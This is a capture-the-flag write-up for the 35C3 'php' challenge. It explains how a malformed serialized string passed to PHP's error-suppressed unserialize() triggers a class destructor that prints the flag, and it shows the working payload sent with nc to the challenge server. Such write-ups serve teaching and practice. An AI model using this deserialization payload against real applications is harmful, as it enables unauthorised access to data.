---
layout: article
title: php
category: 35c3ctf
---

# php
>PHP's unserialization mechanism can be exceptional. Guest challenge by jvoisin.  
>Files at https://35c3ctf.ccc.ac/uploads/php-ff2d1f97076ff25c5d0858616c26fac7.tar. Challenge running at: `nc 35.242.207.13 1`

The tarball contains the following php code:

```php
<?php

$line = trim(fgets(STDIN));
$flag = file_get_contents('./flag');

class B {
  function __destruct() {
    global $flag;
    echo $flag;
  }
}

$a = @unserialize($line);
throw new Exception('Well that was unexpected…');
echo $a;
```

and the service running at `35.242.207.13 1` verifies that it's running the above code.

```bash
➜ nc 35.242.207.13 1
test input
PHP Fatal error:  Uncaught Exception: Well that was unexpected… in /home/user/php.php:16
Stack trace:
#0 {main}
  thrown in /home/user/php.php on line 16
```

From the source code and challenge description, it's obvious this is a PHP deserialization challenge. Our goal is clear, serialize some PHP code that will force the destructor of `B` to be called, echo-ing the flag to our console, _before_ the exception is thrown.

So how exactly do you call a class destructor in PHP? Well, the destructor will be called when the all references to the object are freed or when the script terminates properly - i.e. without any thrown exceptions. Since the exception will be thrown directly after the unserialize call, we can't rely on the script properly terminating. We must call the `__destruct()` function ourselves, ensuring it's done prior the the exception.

One last thing to note before we try any exploits - the `@` symbol before `unserialize()`. For those unfamiliar, when `@` is prepended to a function, any error messages that function may produce will be completely ignored (see: [PHP Error Controls Operators](http://php.net/manual/en/language.operators.errorcontrol.php)). If we were to ignore this symbol we may still get the flag, but we'd miss the nuance of why we were able to get it.

## Solution
From our static analysis, we have a solid idea on the attack vector for this challenge. First let's verify our above analysis by creating a simple serialized object.

```bash
➜ php -a
Interactive shell

php > $flag = "35C3_test_flag_";
php > class B {
php { function __destruct() {
php { global $flag;
php { echo $flag;
php { }
php { }
php > $xpl = new B;
php > echo serialize($xpl);
O:1:"B":0:{}
php >
```
PHP serialized objects are structured as a key-value pairs. Breaking down our serialized object, we have an object `B` (of name length `1`), with `0` properties. For more information, see: [PHP Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html) and [Fuzzing Unserialize](https://www.evonide.com/fuzzing-unserialize/).

With this knowledge, we can abuse the error suppression to create and destroy an object without causing the script to terminate. By sending `@unserialize()` a bad serial, e.g. `O:1:"B":1:{}` or `O:1:"B":0:{b}`, we force the code to instantiate a new object `B` and then free the object (i.e. call the destructor) due to a bad serial exception. The `@` symbol will force the code to ignore the exception and continue executing.

```bash
➜ php nc 35.242.207.13 1
O:1:"B":1:{}
35C3_php_is_fun_php_is_fun
PHP Fatal error:  Uncaught Exception: Well that was unexpected… in /home/user/php.php:16
Stack trace:
#0 {main}
 thrown in /home/user/php.php on line 16
 ```
